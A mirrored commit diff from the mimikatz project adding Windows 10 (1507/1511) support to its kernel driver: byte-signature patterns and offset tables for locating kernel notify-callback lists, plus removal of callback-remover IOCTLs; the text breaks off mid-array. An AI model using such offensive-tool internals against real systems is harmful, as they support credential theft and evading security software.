mirror of
https://github.com/gentilkiwi/mimikatz
synced 2025-03-30 07:26:21 +00:00
Welcom to Windows 10 LTSB & current
[remove] mimidrv & mimikatz kernel module: Process & Object callbacks remover are not anymore in the program [internal] Windows 10 is now splitted in 1507 (LTSB) and 1511 (current) [internal] mimidrv: Windows 10 support added [internal] mimilib WinDBG module & mimikatz::sekurlsa: Windows 10 MSV / Kerberos Tickets are not specific anymore (offsets table) [internal] Using KULL_M_MEMORY_GLOBAL_OWN_HANDLE instead of local variable in each function
This commit is contained in:
Benjamin DELPY
parent
c1c1608ca8
commit
9e298f16e4
@ -76,7 +76,8 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
|
||||
#define KULL_M_WIN_BUILD_7 7600
|
||||
#define KULL_M_WIN_BUILD_8 9200
|
||||
#define KULL_M_WIN_BUILD_BLUE 9600
|
||||
#define KULL_M_WIN_BUILD_10 9800
|
||||
#define KULL_M_WIN_BUILD_10_1507 10240
|
||||
#define KULL_M_WIN_BUILD_10_1511 10586
|
||||
|
||||
#define KULL_M_WIN_MIN_BUILD_XP 2500
|
||||
#define KULL_M_WIN_MIN_BUILD_2K3 3000
|
||||
|
||||
@ -34,9 +34,10 @@ typedef enum _KIWI_OS_INDEX {
|
||||
KiwiOsIndex_7 = 4,
|
||||
KiwiOsIndex_8 = 5,
|
||||
KiwiOsIndex_BLUE = 6,
|
||||
KiwiOsIndex_10 = 7,
|
||||
KiwiOsIndex_10_1507 = 7,
|
||||
KiwiOsIndex_10_1511 = 8,
|
||||
|
||||
KiwiOsIndex_MAX = 8,
|
||||
KiwiOsIndex_MAX = 9,
|
||||
} KIWI_OS_INDEX, *PKIWI_OS_INDEX;
|
||||
|
||||
#ifdef _M_IX86
|
||||
|
||||
@ -25,9 +25,6 @@
|
||||
#define IOCTL_MIMIDRV_NOTIFY_REG_LIST CTL_CODE(FILE_DEVICE_UNKNOWN, 0x043, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
|
||||
#define IOCTL_MIMIDRV_NOTIFY_OBJECT_LIST CTL_CODE(FILE_DEVICE_UNKNOWN, 0x044, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
|
||||
|
||||
#define IOCTL_MIMIDRV_NOTIFY_PROCESS_REMOVE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x045, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
|
||||
#define IOCTL_MIMIDRV_NOTIFY_OBJECT_REMOVE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x049, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
|
||||
|
||||
#define IOCTL_MIMIDRV_FILTER_LIST CTL_CODE(FILE_DEVICE_UNKNOWN, 0x050, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
|
||||
#define IOCTL_MIMIDRV_MINIFILTER_LIST CTL_CODE(FILE_DEVICE_UNKNOWN, 0x051, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
|
||||
|
||||
|
||||
@ -16,7 +16,8 @@ const ULONG MF_OffSetTable[KiwiOsIndex_MAX][MF_MAX] =
|
||||
/* 7 */ {0x004c, 0x000c, 0x0010, 0x0030},
|
||||
/* 8 */ {0x004c, 0x000c, 0x0010, 0x0030},
|
||||
/* BLUE */ {0x004c, 0x000c, 0x0010, 0x0030},
|
||||
/* 10 */ {0x004c, 0x000c, 0x0010, 0x0040},
|
||||
/* 10_1507*/ {0x004c, 0x000c, 0x0010, 0x0040},
|
||||
/* 10_1511*/ {0x004c, 0x000c, 0x0010, 0x0040},
|
||||
#else
|
||||
/* UNK */ {0},
|
||||
/* XP */ {0},
|
||||
@ -25,7 +26,8 @@ const ULONG MF_OffSetTable[KiwiOsIndex_MAX][MF_MAX] =
|
||||
/* 7 */ {0x0090, 0x0018, 0x0020, 0x0050},
|
||||
/* 8 */ {0x0090, 0x0018, 0x0020, 0x0050},
|
||||
/* BLUE */ {0x0090, 0x0018, 0x0020, 0x0050},
|
||||
/* 10 */ {0x0090, 0x0018, 0x0020, 0x0060},
|
||||
/* 10_1507*/{0x0090, 0x0018, 0x0020, 0x0060},
|
||||
/* 10_1511*/{0x0090, 0x0018, 0x0020, 0x0060},
|
||||
#endif
|
||||
};
|
||||
|
||||
|
||||
@ -52,7 +52,7 @@ NTSTATUS kkll_m_modules_fromAddr_callback(SIZE_T szBufferIn, PVOID bufferIn, PKI
|
||||
{
|
||||
*mustContinue = FALSE;
|
||||
pStructAddr->isFound = TRUE;
|
||||
status = kprintf(outBuffer, L"0x%p [%S + 0x%08x]\n", (PVOID) pStructAddr->addr, pModule->FullPathName + pModule->FileNameOffset, pStructAddr->addr - (ULONG_PTR) pModule->BasicInfo.ImageBase);
|
||||
status = kprintf(outBuffer, L"0x%p [%S + 0x%x]\n", (PVOID) pStructAddr->addr, pModule->FullPathName + pModule->FileNameOffset, pStructAddr->addr - (ULONG_PTR) pModule->BasicInfo.ImageBase);
|
||||
}
|
||||
return status;
|
||||
}
|
||||
|
||||
@ -17,35 +17,37 @@ PPSSETCREATEPROCESSNOTIFYROUTINEEX pPsSetCreateProcessNotifyRoutineEx = NULL;
|
||||
POB_PRE_OPERATION_CALLBACK kkll_m_notify_fakePre = NULL;
|
||||
POB_POST_OPERATION_CALLBACK kkll_m_notify_fakePost = NULL;
|
||||
|
||||
|
||||
#ifdef _M_X64
|
||||
UCHAR PTRN_W23_Thread[] = {0x66, 0x90, 0x66, 0x90, 0x48, 0x8b, 0xce, 0xe8};
|
||||
UCHAR PTRN_WVI_Thread[] = {0x49, 0x8b, 0x8c, 0x24, 0xf8, 0x01, 0x00, 0x00, 0x41, 0xb0, 0x01, 0x49, 0x8b, 0x94, 0x24, 0x88, 0x03, 0x00, 0x00};
|
||||
UCHAR PTRN_WI7_Thread[] = {0x41, 0xbf, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xcb, 0xe8};
|
||||
UCHAR PTRN_WI8_Thread[] = {0xbf, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xcb, 0xe8};
|
||||
UCHAR PTRN_W81_Thread[] = {0x41, 0xbf, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xcb, 0xe8};
|
||||
UCHAR PTRN_W10_Thread[] = {0x45, 0x33, 0xc0, 0x48, 0x8d, 0x0c, 0xd9, 0x48, 0x8b, 0xd7, 0xe8};
|
||||
UCHAR PTRN_W10_Thread[] = {0x48, 0x8b, 0xcd, 0xe8};
|
||||
KKLL_M_MEMORY_GENERIC ThreadReferences[] = {
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Thread), PTRN_W23_Thread}, L"PsReferencePrimaryToken", L"CcSetBcbOwnerPointer", { -4, 8}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Thread), PTRN_WVI_Thread}, L"PsDereferenceKernelStack", L"ExRaiseAccessViolation", {-20, 64}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Thread), PTRN_WI7_Thread}, L"PsDereferenceKernelStack", L"MmIsVerifierEnabled", { -4, 64}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Thread), PTRN_WI8_Thread}, L"PsAcquireProcessExitSynchronization", L"FsRtlAddToTunnelCache", { -4, 64}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Thread), PTRN_W81_Thread}, L"RtlCopySidAndAttributesArray", L"NtFindAtom", { -4, 64}},
|
||||
{KiwiOsIndex_10, {sizeof(PTRN_W10_Thread), PTRN_W10_Thread}, L"PsSetCreateThreadNotifyRoutine", L"PsSetCreateProcessNotifyRoutine", { -4, 64}},
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Thread), PTRN_W23_Thread}, L"PsReferencePrimaryToken", L"CcSetBcbOwnerPointer", { -4, 8}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Thread), PTRN_WVI_Thread}, L"PsDereferenceKernelStack", L"ExRaiseAccessViolation", {-20, 64}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Thread), PTRN_WI7_Thread}, L"PsDereferenceKernelStack", L"MmIsVerifierEnabled", { -4, 64}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Thread), PTRN_WI8_Thread}, L"PsAcquireProcessExitSynchronization", L"FsRtlAddToTunnelCache", { -4, 64}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Thread), PTRN_W81_Thread}, L"RtlCopySidAndAttributesArray", L"NtFindAtom", { -4, 64}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_Thread), PTRN_W10_Thread}, L"PsRemoveCreateThreadNotifyRoutine", L"PsRemoveLoadImageNotifyRoutine", { -8, 64}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_Thread), PTRN_W10_Thread}, L"PsRemoveCreateThreadNotifyRoutine", L"PsRemoveLoadImageNotifyRoutine", { -8, 64}},
|
||||
};
|
||||
UCHAR PTRN_W23_Process[] = {0x41, 0xbf, 0x08, 0x00, 0x00, 0x00, 0x49, 0x8b, 0xdf, 0x48, 0x8b, 0xce, 0xe8};
|
||||
UCHAR PTRN_WVI_Process[] = {0x48, 0x89, 0x4c, 0x24, 0x40, 0x41, 0xbe, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0c, 0xc1, 0xe8};
|
||||
UCHAR PTRN_WI7_Process[] = {0x4c, 0x8b, 0xf9, 0x48, 0x8d, 0x0c, 0xc1, 0xe8};
|
||||
UCHAR PTRN_WI8_Process[] = {0x8b, 0xc3, 0x48, 0x8d, 0x34, 0xc1, 0x48, 0x8b, 0xce, 0xe8};
|
||||
UCHAR PTRN_W81_Process[] = {0x48, 0x8d, 0x04, 0xc1, 0x48, 0x89, 0x45, 0x70, 0x48, 0x8b, 0xc8, 0xe8};
|
||||
UCHAR PTRN_W10_Process[] = {0x8b, 0xc3, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd6, 0x49, 0x8d, 0x0c, 0xc7, 0xe8};
|
||||
UCHAR PTRN_W10_1507_Process[] = {0x8b, 0xc3, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd6, 0x49, 0x8d, 0x0c, 0xc7, 0xe8};
|
||||
UCHAR PTRN_W10_1511_Process[] = {0x49, 0x8d, 0x0c, 0xff, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd6, 0xe8};
|
||||
KKLL_M_MEMORY_GENERIC ProcessReferences[] = {
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Process), PTRN_W23_Process}, L"PsReferencePrimaryToken", L"CcSetBcbOwnerPointer", { -4, 8}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Process), PTRN_WVI_Process}, L"SeCreateAccessStateEx", L"PsReferenceImpersonationToken", { -4, 64}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Process), PTRN_WI7_Process}, L"RtlAreAllAccessesGranted", L"RtlGetIntegerAtom", { -4, 64}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Process), PTRN_WI8_Process}, L"PsAcquireProcessExitSynchronization", L"FsRtlAddToTunnelCache", { -4, 64}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Process), PTRN_W81_Process}, L"RtlCopySidAndAttributesArray", L"NtFindAtom", { -4, 64}},
|
||||
{KiwiOsIndex_10, {sizeof(PTRN_W10_Process), PTRN_W10_Process}, L"PsSetCreateProcessNotifyRoutine", L"IoReportDetectedDevice", { -4, 64}},
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Process), PTRN_W23_Process}, L"PsReferencePrimaryToken", L"CcSetBcbOwnerPointer", { -4, 8}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Process), PTRN_WVI_Process}, L"SeCreateAccessStateEx", L"PsReferenceImpersonationToken", { -4, 64}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Process), PTRN_WI7_Process}, L"RtlAreAllAccessesGranted", L"RtlGetIntegerAtom", { -4, 64}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Process), PTRN_WI8_Process}, L"PsAcquireProcessExitSynchronization", L"FsRtlAddToTunnelCache", { -4, 64}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Process), PTRN_W81_Process}, L"RtlCopySidAndAttributesArray", L"NtFindAtom", { -4, 64}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_1507_Process), PTRN_W10_1507_Process}, L"PsSetCreateProcessNotifyRoutine", L"IoReportDetectedDevice", { -4, 64}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_1511_Process), PTRN_W10_1511_Process}, L"PsSetCreateProcessNotifyRoutine", L"ObRegisterCallbacks", { -4, 64}},
|
||||
};
|
||||
UCHAR PTRN_W23_Image[] = {0x4c, 0x8b, 0xf1, 0x48, 0x89, 0x78, 0x20, 0x4d, 0x8b, 0xe0, 0x4c, 0x8b, 0xea, 0xbd, 0x08, 0x00, 0x00, 0x00};
|
||||
UCHAR PTRN_WVI_Image[] = {0x4c, 0x8b, 0xf2, 0x41, 0x0f, 0xba, 0x6d, 0x00, 0x0a, 0x4c, 0x8b, 0xf9, 0x49, 0xc7, 0x00, 0x38, 0x00, 0x00, 0x00};
|
||||
@ -54,40 +56,43 @@ UCHAR PTRN_WI8_Image[] = {0xbf, 0x08, 0x00, 0x00, 0x00, 0x41, 0x89, 0x06, 0x0f,
|
||||
UCHAR PTRN_W81_Image[] = {0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd7, 0x48, 0x8d, 0x0c, 0xd9, 0xe8};
|
||||
UCHAR PTRN_W10_Image[] = {0x45, 0x33, 0xc0, 0x48, 0x8d, 0x0c, 0xd9, 0x48, 0x8b, 0xd7, 0xe8};
|
||||
KKLL_M_MEMORY_GENERIC ImageReferences[] = {
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Image), PTRN_W23_Image}, L"PsRemoveLoadImageNotifyRoutine", L"PsSetLegoNotifyRoutine", { -4, 8}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Image), PTRN_WVI_Image}, L"NtRequestPort", L"RtlQueryTimeZoneInformation", { -4, 8}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Image), PTRN_WI7_Image}, L"FsRtlReleaseFile", L"IoSetPartitionInformationEx", { -4, 64}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Image), PTRN_WI8_Image}, L"ExSizeOfRundownProtectionCacheAware", L"MmProbeAndLockProcessPages", { -4, 8}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Image), PTRN_W81_Image}, L"PsSetLoadImageNotifyRoutine", L"PsSetCreateThreadNotifyRoutine", { -4, 64}},
|
||||
{KiwiOsIndex_10, {sizeof(PTRN_W10_Image), PTRN_W10_Image}, L"PsSetLoadImageNotifyRoutine", L"ObRegisterCallbacks", { -4, 64}},
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Image), PTRN_W23_Image}, L"PsRemoveLoadImageNotifyRoutine", L"PsSetLegoNotifyRoutine", { -4, 8}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Image), PTRN_WVI_Image}, L"NtRequestPort", L"RtlQueryTimeZoneInformation", { -4, 8}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Image), PTRN_WI7_Image}, L"FsRtlReleaseFile", L"IoSetPartitionInformationEx", { -4, 64}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Image), PTRN_WI8_Image}, L"ExSizeOfRundownProtectionCacheAware", L"MmProbeAndLockProcessPages", { -4, 8}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Image), PTRN_W81_Image}, L"PsSetLoadImageNotifyRoutine", L"PsSetCreateThreadNotifyRoutine", { -4, 64}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_Image), PTRN_W10_Image}, L"PsSetLoadImageNotifyRoutine", L"PsSetCreateProcessNotifyRoutine", { -4, 64}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_Image), PTRN_W10_Image}, L"PsSetLoadImageNotifyRoutine", L"PsSetCreateProcessNotifyRoutine", { -4, 64}},
|
||||
};
|
||||
UCHAR PTRN_W23_Object[] = {0x40, 0x32, 0xf6, 0x4c, 0x89, 0x7c, 0x24, 0x78, 0x45, 0x33, 0xff, 0x4d, 0x85, 0xe4};
|
||||
UCHAR PTRN_WVI_Object[] = {0x41, 0x8a, 0xdf, 0x4c, 0x89, 0x7c, 0x24, 0x58, 0x4d, 0x3b, 0xe7, 0x88, 0x5c, 0x24, 0x66, 0x4c, 0x89, 0x7c, 0x24, 0x50, 0x49, 0x8b, 0xef, 0xc7, 0x44, 0x24, 0x68};
|
||||
UCHAR PTRN_WI7_Object[] = {0x41, 0x8a, 0xde, 0x44, 0x88, 0x74, 0x24, 0x47, 0x88, 0x5c, 0x24, 0x46, 0x4c, 0x89, 0x74, 0x24, 0x38, 0x4c, 0x89, 0x74, 0x24, 0x30, 0x49, 0x8b, 0xee, 0xc7, 0x44, 0x24, 0x48};
|
||||
UCHAR PTRN_WI8_Object[] = {0x41, 0x8a, 0xd8, 0x44, 0x88, 0x44, 0x24, 0x4f, 0x88, 0x5c, 0x24, 0x4e, 0x4c, 0x89, 0x44, 0x24, 0x38, 0x4d, 0x8b, 0xf0, 0x4c, 0x89, 0x44, 0x24, 0x30, 0xc7, 0x44, 0x24, 0x50};
|
||||
UCHAR PTRN_W81_Object[] = {0x41, 0x8a, 0xd8, 0x44, 0x88, 0x44, 0x24, 0x4f, 0x88, 0x5c, 0x24, 0x4e, 0x4c, 0x89, 0x44, 0x24, 0x38, 0x4d, 0x8b, 0xf0, 0x4c, 0x89, 0x44, 0x24, 0x30, 0xc7, 0x44, 0x24, 0x50};
|
||||
UCHAR PTRN_W10_Object[] = {0x41, 0x8a, 0xd8, 0x88, 0x5c, 0x24, 0x4e, 0x4d, 0x8b, 0xf0, 0x44, 0x88, 0x44, 0x24, 0x4f};
|
||||
UCHAR PTRN_W10_Object[] = {0x0f, 0xb7, 0x02, 0xff, 0xc9, 0x49, 0x03};
|
||||
KKLL_M_MEMORY_GENERIC ObjectReferences[] = {
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Object), PTRN_W23_Object}, L"ObCreateObjectType", L"ObReferenceSecurityDescriptor", { -4, 0x078, 0x0d8}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Object), PTRN_WVI_Object}, L"ObRegisterCallbacks", L"ObCreateObjectType", { -4, 0x010, 0x070, 0x228}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Object), PTRN_WI7_Object}, L"ObUnRegisterCallbacks", L"ObCreateObjectType", { -4, 0x010, 0x070, 0x0c0}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Object), PTRN_WI8_Object}, L"ObCreateObjectType", L"IoCreateController", { -4, 0x010, 0x070, 0x0c8}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Object), PTRN_W81_Object}, L"ObCreateObjectType", L"RtlRunOnceInitialize", { -4, 0x010, 0x070, 0x0c8}},
|
||||
{KiwiOsIndex_10, {sizeof(PTRN_W10_Object), PTRN_W10_Object}, L"ObCreateObjectType", L"RtlRunOnceInitialize", { -4, 0x010, 0x070, 0x0c8}},
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Object), PTRN_W23_Object}, L"ObCreateObjectType", L"ObReferenceSecurityDescriptor", { -4, 0x078, 0x0d8}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Object), PTRN_WVI_Object}, L"ObRegisterCallbacks", L"ObCreateObjectType", { -4, 0x010, 0x070, 0x228}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Object), PTRN_WI7_Object}, L"ObUnRegisterCallbacks", L"ObCreateObjectType", { -4, 0x010, 0x070, 0x0c0}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Object), PTRN_WI8_Object}, L"ObCreateObjectType", L"IoCreateController", { -4, 0x010, 0x070, 0x0c8}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Object), PTRN_W81_Object}, L"ObCreateObjectType", L"RtlRunOnceInitialize", { -4, 0x010, 0x070, 0x0c8}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_Object), PTRN_W10_Object}, L"ObCreateObjectType", L"RtlRunOnceInitialize", { 25, 0x010, 0x070, 0x0c8}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_Object), PTRN_W10_Object}, L"ObCreateObjectType", L"RtlRunOnceInitialize", { 25, 0x010, 0x070, 0x0c8}},
|
||||
};
|
||||
UCHAR PTRN_W23_Reg[] = {0x49, 0x8d, 0x0c, 0xdc, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd7, 0xe8};
|
||||
UCHAR PTRN_WVI_Reg[] = {0x48, 0x8b, 0xf0, 0x48, 0x89, 0x44, 0x24, 0x38, 0x48, 0x85, 0xc0, 0x0f, 0x84};
|
||||
UCHAR PTRN_WI7_Reg[] = {0x48, 0x8b, 0xf8, 0x48, 0x89, 0x44, 0x24, 0x28, 0x48, 0x3b, 0xc3, 0x0f, 0x84};
|
||||
UCHAR PTRN_WI8_Reg[] = {0x49, 0x8b, 0x04, 0x24, 0x48, 0x3b, 0x43, 0x18, 0x74};
|
||||
UCHAR PTRN_W81_Reg[] = {0x49, 0x8b, 0x04, 0x24, 0x48, 0x3b, 0x43, 0x18, 0x74};
|
||||
UCHAR PTRN_W10_Reg[] = {0x48, 0x8b, 0x46, 0x08, 0x48, 0x8b, 0x08, 0x48, 0x89, 0x0f, 0x48, 0x89, 0x47, 0x08};
|
||||
UCHAR PTRN_W10_Reg[] = {0x48, 0x8b, 0xf8, 0x48, 0x89, 0x44, 0x24, 0x40, 0x48, 0x85, 0xc0, 0x0f, 0x84};
|
||||
KKLL_M_MEMORY_GENERIC RegReferences[] = {
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Reg), PTRN_W23_Reg}, L"CmRegisterCallback", L"CmUnRegisterCallback", { -6}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Reg), PTRN_WVI_Reg}, L"CmUnRegisterCallback", L"SeSetAuthorizationCallbacks", { -9, 0x030}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Reg), PTRN_WI7_Reg}, L"CmUnRegisterCallback", L"CmRegisterCallback", { -9, 0x028}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Reg), PTRN_WI8_Reg}, L"CmSetCallbackObjectContext", L"CmGetCallbackVersion", { -9, 0x028}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Reg), PTRN_W81_Reg}, L"CmSetCallbackObjectContext", L"DbgkLkmdUnregisterCallback", { -9, 0x028}},
|
||||
{KiwiOsIndex_10, {sizeof(PTRN_W10_Reg), PTRN_W10_Reg}, L"CmRegisterCallback", L"IoEnumerateRegisteredFiltersList",{ -13, 0x028}},
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Reg), PTRN_W23_Reg}, L"CmRegisterCallback", L"CmUnRegisterCallback", { -6}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Reg), PTRN_WVI_Reg}, L"CmUnRegisterCallback", L"SeSetAuthorizationCallbacks", { -9, 0x030}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Reg), PTRN_WI7_Reg}, L"CmUnRegisterCallback", L"CmRegisterCallback", { -9, 0x028}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Reg), PTRN_WI8_Reg}, L"CmSetCallbackObjectContext", L"CmGetCallbackVersion", { -9, 0x028}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Reg), PTRN_W81_Reg}, L"CmSetCallbackObjectContext", L"DbgkLkmdUnregisterCallback", { -9, 0x028}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_Reg), PTRN_W10_Reg}, L"CmUnRegisterCallback", L"FsRtlAllocateResource", { -9, 0x028}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_Reg), PTRN_W10_Reg}, L"CmUnRegisterCallback", L"FsRtlAllocateResource", { -9, 0x028}},
|
||||
};
|
||||
#elif defined _M_IX86
|
||||
UCHAR PTRN_WXP_Thread[] = {0xc7, 0x45, 0xa4, 0x08, 0x00, 0x00, 0x00, 0xff, 0x75, 0xbc, 0xe8};
|
||||
@ -97,14 +102,15 @@ UCHAR PTRN_WI7_Thread[] = {0xc7, 0x45, 0x0c, 0x40, 0x00, 0x00, 0x00, 0x56, 0xe8}
|
||||
UCHAR PTRN_WI8_Thread[] = {0xbb, 0x40, 0x00, 0x00, 0x00, 0x8d, 0x1b, 0xe8};
|
||||
UCHAR PTRN_W81_Thread[] = {0xc7, 0x45, 0xa8, 0x40, 0x00, 0x00, 0x00, 0x8b, 0xcf, 0xe8};
|
||||
UCHAR PTRN_W10_Thread[] = {0x33, 0xf6, 0x6a, 0x00, 0x8b, 0xd3, 0x8b, 0xcf, 0xe8};
|
||||
KKLL_M_MEMORY_GENERIC ThreadReferences[] = {
|
||||
{KiwiOsIndex_XP, {sizeof(PTRN_WXP_Thread), PTRN_WXP_Thread}, L"NtSetInformationProcess", L"LdrEnumResources", { -4, 8}},
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Thread), PTRN_W23_Thread}, L"NtSetInformationProcess", L"LdrEnumResources", { -4, 8}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Thread), PTRN_WVI_Thread}, L"RtlValidSid", L"NtOpenThreadTokenEx", { -4, 64}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Thread), PTRN_WI7_Thread}, L"RtlCompareUnicodeStrings", L"ObQueryNameString", { -4, 64}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Thread), PTRN_WI8_Thread}, L"PsAssignImpersonationToken", L"NtFindAtom", { -4, 64}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Thread), PTRN_W81_Thread}, L"RtlGetIntegerAtom", L"PsGetThreadSessionId", { -4, 64}},
|
||||
{KiwiOsIndex_10, {sizeof(PTRN_W10_Thread), PTRN_W10_Thread}, L"PsSetCreateProcessNotifyRoutine", L"PoRegisterCoalescingCallback", { -4, 64}},
|
||||
KKLL_M_MEMORY_GENERIC ThreadReferences[] = { // PspCreateThreadNotifyRoutine
|
||||
{KiwiOsIndex_XP, {sizeof(PTRN_WXP_Thread), PTRN_WXP_Thread}, L"NtSetInformationProcess", L"LdrEnumResources", { -4, 8}},
|
||||
{KiwiOsIndex_2K3, {sizeof(PTRN_W23_Thread), PTRN_W23_Thread}, L"NtSetInformationProcess", L"LdrEnumResources", { -4, 8}},
|
||||
{KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Thread), PTRN_WVI_Thread}, L"RtlValidSid", L"NtOpenThreadTokenEx", { -4, 64}},
|
||||
{KiwiOsIndex_7, {sizeof(PTRN_WI7_Thread), PTRN_WI7_Thread}, L"RtlCompareUnicodeStrings", L"ObQueryNameString", { -4, 64}},
|
||||
{KiwiOsIndex_8, {sizeof(PTRN_WI8_Thread), PTRN_WI8_Thread}, L"PsAssignImpersonationToken", L"NtFindAtom", { -4, 64}},
|
||||
{KiwiOsIndex_BLUE, {sizeof(PTRN_W81_Thread), PTRN_W81_Thread}, L"RtlGetIntegerAtom", L"PsGetThreadSessionId", { -4, 64}},
|
||||
{KiwiOsIndex_10_1507, {sizeof(PTRN_W10_Thread), PTRN_W10_Thread}, L"PsSetCreateProcessNotifyRoutine", L"PoRegisterCoalescingCallback", { -4, 64}},
|
||||
{KiwiOsIndex_10_1511, {sizeof(PTRN_W10_Thread), PTRN_W10_Thread}, L"PsSetCreateProcessNotifyRoutine", L"PoRegisterCoalescingCallback", { -4, 64}},
|
||||
};
|
||||
UCHAR PTRN_WXP_Process[] = {0xc7, 0x45, 0xb0, 0x08, 0x00, 0x00, 0x00, 0xff, 0x75, 0xcc, 0xe8};
|
||||
UCHAR PTRN_W23_Process[] = {0xc7, 0x45, 0xb0, 0x08, 0x00, 0x00, 0x00, 0xff, 0x75, 0xc8, 0xe8};
|
||||
@ -112,15 +118,17 @@ UCHAR PTRN_WVI_Process[] = {0x89, 0x4d, 0x20, 0xff, 0x75, 0x18, 0xe8};
|
||||
UCHAR PTRN_WI7_Process[] = {0x83, 0x65, 0x30, 0x00, 0xff, 0x75, 0x20, 0xe8};
|
||||
UCHAR PTRN_WI8_Process[] = {0x83, 0xc0, 0x40, 0x89, 0x85, 0x58, 0xff, 0xff, 0xff, 0x8d, 0x85, 0x3c, 0xff, 0xff, 0xff, 0x89, 0x45, 0x9c, 0xbe};
|
||||
UCHAR PTRN_W81_Process[] = {0x89, 0x45, 0x9c, 0x83, 0x65, 0x8c, 0x00, 0x8b, 0xc8, 0xe8};
|
||||
UCHAR PTRN_W10_Process[] = {0x8b, 0xdf, 0x89, 0x45, 0xf8, 0x8b, 0xd1, 0x8b, 0xc8, 0x57, 0xe8};
|
||||
KKLL_M_MEMORY_GENERIC ProcessReferences[] = {
|
||||
